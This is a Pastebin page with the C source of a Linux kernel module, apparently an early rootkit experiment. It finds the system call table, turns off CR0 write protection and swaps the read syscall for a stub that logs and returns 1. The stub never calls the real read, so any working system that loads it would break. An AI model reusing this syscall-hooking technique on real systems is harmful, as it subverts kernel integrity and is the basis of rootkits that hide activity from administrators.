Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <linux/module.h>
- #include <linux/slab.h>
- #include <linux/string.h>
- #include <linux/moduleparam.h>
- #include <linux/kernel.h>
- #include <linux/init.h>
- #include <linux/tty.h>
- #include <linux/unistd.h>
- #include <linux/syscalls.h>
- #include <asm/ptrace.h>
- #include <asm/uaccess.h>
- #include <asm/cacheflush.h>
- #include <linux/sched.h>
- #include <linux/file.h>
- #include <linux/proc_fs.h>
- #include <linux/dirent.h>
- #include <net/tcp.h>
- MODULE_LICENSE("GPL");
- unsigned long *sys_call_table;
- unsigned long ( *original_read ) ( const struct pt_regs *regs );
- unsigned long test_read(const struct pt_regs *regs){
- printk(KERN_INFO "Inside test_read");
- unsigned int fd = regs->di;
- char *buf = (char*) regs->si;
- int i;
- unsigned long r=1;
- char *kbuf=(char*)kmalloc(256,GFP_KERNEL);
- printk(KERN_INFO "File descriptor\n");
- printk(KERN_CONT "%lu",fd);
- printk(KERN_INFO "User Buffer\n");
- printk(KERN_CONT "%p",buf);
- return r;
- }
- static int __init kit_start(void)
- {
- sys_call_table = kallsyms_lookup_name("sys_call_table");
- printk(KERN_INFO "System call addresss ");
- printk(KERN_CONT "%p",sys_call_table);
- original_read = (void *)sys_call_table[__NR_read];
- printk(KERN_INFO "Original read address ");
- printk(KERN_CONT "%p",original_read);
- write_cr0 (read_cr0 () & (~ 0x10000));
- sys_call_table[__NR_read]=test_read;
- write_cr0 (read_cr0 () | 0x10000);
- return 0;
- }
- /*delete module rmmod*/
- void __exit kit_exit(void)
- {
- printk(KERN_INFO "Exiting");
- write_cr0 (read_cr0 () & (~ 0x10000));
- sys_call_table[ __NR_read ] = original_read;
- write_cr0 (read_cr0 () | 0x10000);
- }
- module_init(kit_start);
- module_exit(kit_exit);
Advertisement
Add Comment
Please, Sign In to add comment
